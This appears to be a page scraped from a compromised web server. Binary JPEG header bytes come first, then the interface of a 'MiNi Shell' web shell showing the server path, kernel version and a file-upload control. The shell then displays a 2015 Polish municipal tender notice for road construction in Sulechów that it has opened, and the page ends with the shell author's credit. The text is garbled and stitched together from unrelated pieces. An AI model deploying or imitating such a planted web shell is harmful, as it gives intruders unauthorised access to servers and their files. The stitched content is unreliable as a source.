JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150304/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150304/29957-N-2015.html

<p class="kh_header"><b>Sulechów: Budowa drogi - ulica: Ptasia oraz budowa drogi - ul. Żurawia
 w ramach realizacji zadania pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia</b><br>
<b>Numer ogłoszenia: 29957 - 2015; data zamieszczenia: 04.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Sulechów , Plac Ratuszowy 6, 66-100 Sulechów, woj. lubuskie, tel. 068 3851120, faks 068 3854686.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sulechow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa drogi - ulica: Ptasia oraz budowa drogi - ul. Żurawia
 w ramach realizacji zadania pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1	Opis przedmiotu zamówienia: 
Zamówienie obejmuje realizację:
1)	zadania pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia - Etap II ul. Ptasia,
2)	zadania pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia - Etap I ul. Żurawia, współfinansowane środkami pochodzącymi z budżetu państwa w ramach Programu Wieloletniego pod nazwą Narodowy Program Prze-budowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój. 
1.2	    Szczegółowy zakres robót określa Projekt Budowlany zatwierdzony decyzją nr 859/14 Staro-sty Zielonogórskiego z dnia 25.09.2014 r. w części dotyczącej budowy ulicy Ptasiej - dla za-dania, o którym mowa w pkt 1.1 ppkt 1 powyżej oraz Projekt Budowlany zatwierdzony decy-zją nr 860/14 Starosty Zielonogórskiego o pozwoleniu na budowę z dnia 25.09.2014 r. w czę-ści dotyczącej budowy ul. Żurawiej - dla zadania, o którym mowa w pkt. 1.1 ppkt 2 powyżej, a także Projekty Wykonawcze oraz przedmiary robót, opracowane przez AR-DOM Biuro Pro-jektowo-Usługowe mgr inż. Arkadiusz Żurakowski z siedzibą w Prudniku przy ul. Mierosław-skiego 19.
1.3	Wykonawca zrealizuje roboty z materiałów własnych, które zakupi i dostarczy na teren budo-wy na własny koszt i ryzyko.
1.4	Wykonawca musi uwzględnić:
1)	zabezpieczenie terenu budowy,
2)	konieczność wykonania w pierwszej kolejności zadania pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia - Etap II ul. Ptasia, przed przystąpieniem do wykonania zadania pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia - Etap I ul. Żurawia,
3)	wywiezienie materiałów rozbiórkowych i odpadów z terenu budowy - w cenie należy uwzględnić transport do podmiotu zajmującego się odzyskiem odpadów lub transport, utylizację oraz składowanie na składowisku odpadów - dot. tej części materiałów, które zgodnie z odrębnymi przepisami zalicza się do opadów; Wykonawca winien posiadać stosowne zezwolenie na transport odpadów lub wykonać tę część zamówienia przy pomocy podmiotu, który takowe posiada,
4)	wywiezienie wykorytowanej ziemi urodzajnej oraz materiału z koryta - kruszywa łamanego, piasku i in. który wskaże inspektor nadzoru,  w miejsce wskazane przez Zamawiającego, na terenie miasta Sulechów lub wsi bezpośrednio sąsiadujących z Sulechowem, 
5)	paletowanie i przewóz materiałów rozbiórkowych, w tym m. in. płyt betonowych, w miejsce wskazane przez Zamawiającego, na terenie miasta Sulechów,
6)	uporządkowanie terenów zielonych w obrębie prowadzonych robót po ich zakończeniu,
7)	uporządkowanie terenu budowy, zaplecza budowy, jak również terenów sąsiadujących, zajętych przez Wykonawcę na potrzeby realizacji robót, łącznie z przywróceniem zagospodarowania terenów w zieleń i odtworzeniem uszkodzonych, w szczególności wskutek poruszania się sprzętu budowlanego i transportu ciężkiego, nawierzchni drogowych, poza terenem budowy,
8)	uzgodnienie we własnym zakresie miejsca poboru wody i energii oraz ewentualnie punktu zrzutu ścieków,
9)	zorganizowanie we własnym zakresie:
a)	zaplecza budowy, 
b)	terenu niezbędnego do składowania materiałów oraz postoju maszyn i urządzeń,
10)	zastosowanie krawężników o kształcie łukowym i odpowiednim promieniu łuku na łukach - Zamawiający nie dopuszcza zastosowania na łukach krawężników prostych, chyba, że nie będzie możliwości dobrania krawężników łukowych o odpowiednim promieniu łuku,
11)	połączenie krawężników najazdowych z wystającymi za pomocą krawężników łączących - skośnych,
12)	wykonanie, przy udziale inspektora nadzoru robót i w miejscach przez niego wskazanych, badań wskaźnika zagęszczenia gruntu przy zastosowaniu:
a)	lekkiej płyty dynamicznej O 300 mm, w obrębie nawierzchni i wjazdów z kostki bru-kowej betonowej, na warstwie podbudowy z kruszyw łamanych, nie rzadziej niż co ok. 30 metrów,
b)	VSS - min. 10 badań,
13)	konieczność częściowej przebudowy istniejących zjazdów o nawierzchni utwardzonej, w zakresie niezbędnym do dostosowania ich wysokości do zaprojektowanej niwelety drogi,
14)	koszt nadzoru z ramienia Rejonu Dystrybucji Gazu Wolsztyn nad robotami w obrębie czynnych gazociągów o ciśnieniu do 0,5 MPa, zgodnie z uzgodnieniem nr TW-4274/DO-UZG-101002/2014 z dnia 07.03.2014 r.,
15)	obowiązek wykonania i montażu tablic informacyjno-promocyjnych w ciągu drogi ul. Żu-rawia, w miejscach uzgodnionych z Zamawiającym, o wymiarach 60x70 cm zgodnych z wymogami określonymi przez NPPDL - wg załączonego do SIWZ (IV rozdział) schema-tu i opisu, na słupkach z rury stalowej min. O70 mm o długości min. 4,5 m - 2 kpl.
1.5	Materiały rozbiórkowe  stanowią własność Zamawiającego.
1.6	W robotach drogowych nie dopuszcza się stosowania tłucznia pomiedziowego.
1.7	Do wykonania przedmiotu zamówienia należy zastosować betonowe elementy brukowe dopuszczone do stosowania w budownictwie, spełniające wymagania Polskich Norm tj.:
a)	PN-EN 1338:2005 Betonowa kostka brukowa. Wymagania i metody badań,
b)	PN-EN 1340:2004 Krawężniki betonowe. Wymagania i metody badań, przy czym dla kostki betonowej:
- odporność na warunki atmosferyczne - klasa 3 oznaczenie D,
- odporność na ścieranie - klasa 4 oznaczenie I,
- wytrzymałość na rozciąganie przy rozłupywaniu - zgodna z wymaganiami normy,
dla krawężników betonowych:
- odporność na warunki atmosferyczne - klasa 3 oznaczenie D,
- wytrzymałości na zginanie - klasa 3 oznaczenie U, 
- odporność na ścieranie - klasa 4 oznaczenie I.
1.8	Pomimo uwzględnienia w dokumentacji projektowej, w części dotyczącej budowy oświetlenia ulicznego, opraw do lamp sodowych, II klasa izolacji, o mocy 100W, strumień świetlny oprawy 9000 lumenów, w ofercie należy uwzględnić zamiennie oprawy LED z wysokowydajną optyką fotometryczną, spełniające wymagania PN-83/E-06305. Ww. zmiana dotyczy 33 szt. opraw w ul. Żurawiej i 3 szt. opraw w ul. Ptasiej. Parametry i wymagania dotyczące zamiennych opraw określa opis szczegółowy opraw oświetleniowych zamieszczony w IV rozdziale SIWZ. 
1.9	W obrębie terenu budowy ulicy Żurawiej, w okresie poprzedzającym wykonanie przedmiotu umowy, będą prowadzone roboty związane z budową kanalizacji sanitarnej. Inwestorem tego zadania będzie Sulechowskie Przedsiębiorstwo Komunalne SuPeKom sp. z o. o.  z siedzibą w Sulechowie przy ul. Poznańskiej 18. Zamawiający zamierza przekazać wykonawcy teren budowy ul. Żurawiej w terminie do 31 lipca 2015 r.
1.10	Zamawiający nie dopuszcza składania ofert wariantowych i/lub częściowych.
1.11	Zamawiający nie przewiduje udzielenia zamówień uzupełniających.
1.12	Zamawiający dopuszcza składanie ofert równoważnych - w przypadku gdy w przedmiarze robót, dokumentacji projektowej oraz STWiOR użyte są nazwy własne materiałów i urządzeń Wykonawca może przewidzieć realizację zadania przy pomocy równoważnych materiałów i urządzeń o parametrach nie gorszych od zaprojektowanych.
1.13	Zamawiający nie będzie dokonywał wyboru oferty najkorzystniejszej z zastosowaniem aukcji elektronicznej.
1.14	Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
1.15	Wykonawca może przewidzieć wykonanie przedmiotu umowy przy pomocy podwykonawców..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.23.31.42-6, 45.23.32.20-7, 45.23.32.53-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Oferta musi być zabezpieczona wadium w wysokości 100.000,00 zł (słownie: sto tysięcy złotych 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z należytą starannością roboty budowlane, polegające na budowie, przebudowie lub remoncie dróg o wartości nie mniejszej niż 2 000 000,- zł każda - dwie roboty, w których występowało jednocześnie w każdej z tych robót wykonanie kanalizacji deszczowej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel, w tym:
a)	kierownika budowy z uprawnieniami budowlanymi do kierowania robotami drogowymi, po-siadającego minimum 5 letnie doświadczenie w kierowaniu budową,
b)	pracownika z uprawnieniami do kierowania robotami w specjalności instalacyjnej w zakresie sieci kanalizacyjnych posiadający minimum 5 letnie doświadczenie w kierowaniu robotami,
c)	pracownika z uprawnieniami do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych posiadający minimum 5 letnie doświadczenie w kierowaniu robotami.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>3.1.	Formularz oferty na załączniku nr 1.
3.2.	Dane Wykonawcy na załączniku nr 1a.
3.3.	Uproszczone kosztorysy ofertowe dla każdego z zadań zawierające co najmniej nastę-pujące kolumny: liczba porządkowa, opis, jednostka miary, cena jednostkowa netto, war-tość netto. W przypadku gdy Wykonawca zamieści w kosztorysie ofertowym podstawy nakładów lub podstawy nakładów odmienne niż w złączonym do siwz przedmiarze robót, Zamawiający nie będzie brał zastosowanych podstaw nakładów pod uwagę przy ocenie ofert.
3.4.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych in-nych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawia-jąc w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji nie-zbędnych zasobów na potrzeby wykonania zamówienia.
3.5.	W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udziele-nie zamówienia:
a)	zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają oni pełno-mocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo repre-zentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, pełnomocnictwo to musi być podpisane przez wszystkich Wykonawców,
b)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w pkt III.4.2) oraz dokumenty o których mowa w pkt III.4.4)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - wydłużenie okresu gwarancji ponad wymagane 60 miesięcy - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający dopuszcza dokonanie zmian w umowie dotyczących:
1)	terminów realizacji zadania - zmiana terminów realizacji zadania możliwa będzie w następują-cych przypadkach :
a)	w przypadku przekazania przez Zamawiającego Wykonawcy terenu budowy dla zada-nia pn. Budowa dróg - ulice: Ptasia, Skowronkowa, Łabędzia, Bociania, Słowikowa, Kukułcza i Żurawia - Etap I ul. Żurawia po terminie określonym w § 4 ust. 1 pkt 1 lit. b) projektu umowy tj. po 31 lipca 2015 r.,
b)	wystąpienia w trakcie wykonywania robót niekorzystnych warunków atmosferycznych, które w znaczny sposób opóźniłyby zakończenie robót,
c)	wstrzymania robót lub przerw w pracach, powstałych z przyczyn leżących po stronie Zamawiającego,
d)	wstrzymania robót, na mocy decyzji organów uprawnionych do wstrzymania lub prze-rwania robót, z przyczyn niezależnych od Zamawiającego lub Wykonawcy,
e)	wstrzymania robót na mocy decyzji Zamawiającego lub innych organów, 
z przyczyn innych, niż związane z błędnym sposobem realizacji robót przez Wykonaw-cę, użyciem przez niego wadliwych materiałów czy też naruszeniem przez Wykonawcę przepisów prawa,
f)	konieczności usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej, jeże-li konieczność usunięcia wad lub wprowadzenia zmian w dokumentacji projektowej ma wpływ na termin wykonania umowy,
g)	wystąpienia w trakcie wykonywania robót kolizji z sieciami lub innymi przeszkodami, nie ujętych w dokumentacji projektowej, 
h)	konieczności prowadzenia na terenie budowy wykopalisk archeologicznych, usunięcia niewypałów lub niewybuchów, wystąpienia odmiennych od  przyjętych w dokumentacji projektowej warunków geologicznych,
i)	zlecenia wykonania zamówienia dodatkowego, którego wykonanie ma wpływ na zmia-nę terminu realizacji robót objętych niniejszą umową,
j)	skrócenia terminu realizacji za zgodą Zamawiającego i Wykonawcy,
k)	wydłużenia terminu realizacji w przypadku nieotrzymania przez Gminę Sulechów dofi-nansowania na realizację zadania w roku 2015.
2)	zmian w sposobie spełnienia świadczenia, w przypadku:
a)	niedostępności na rynku materiałów lub urządzeń wskazanych w dokumentacji projek-towej, spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń; pojawienia się na rynku materiałów lub urządzeń nowszej generacji po-zwalających na zaoszczędzenie kosztów eksploatacji wykonanego przedmiotu umowy,
b)	konieczności zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych niż wskazane w dokumentacji projektowej,   
c)	aktualizacji rozwiązań projektowych z uwagi na postęp technologiczny lub zmiany obo-wiązujących przepisów,
3)	zmian wynagrodzenia, ze względu na zmiany zakresu rzeczowego w przypadkach będących następstwem konieczności usunięcia wad lub wprowadzenia zmian w projekcie,
4)	liczby, wysokości i terminów zapłaty poszczególnych części wynagrodzenia Wykonawcy w przypadku, gdy z przyczyn określonych w punkcie 1) powyżej nastąpi zmiana terminów reali-zacji umowy, 
5)	zmian nazwy zadania, numerów kont bankowych oraz działów, rozdziałów i paragrafów kla-syfikacji budżetowej,
2.	Zamawiający dopuszcza możliwość zmiany istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wprowadze-nia w życie, po podpisaniu umowy, regulacji prawnych wywołujących potrzebę dostosowania umowy do nowych regulacji prawnych wraz ze skutkami wprowadzenia takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.sulechow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego:
Urząd Miejski Sulechów
Plac Ratuszowy 6
66-100 Sulechów
Wydział BZ, pok. 119b.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.03.2015 godzina 09:30, miejsce: Siedziba Zamawiającego:
Urząd Miejski Sulechów
Plac Ratuszowy 6
66-100 Sulechów
Biuro Obsługi Interesanta, pok. 002.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com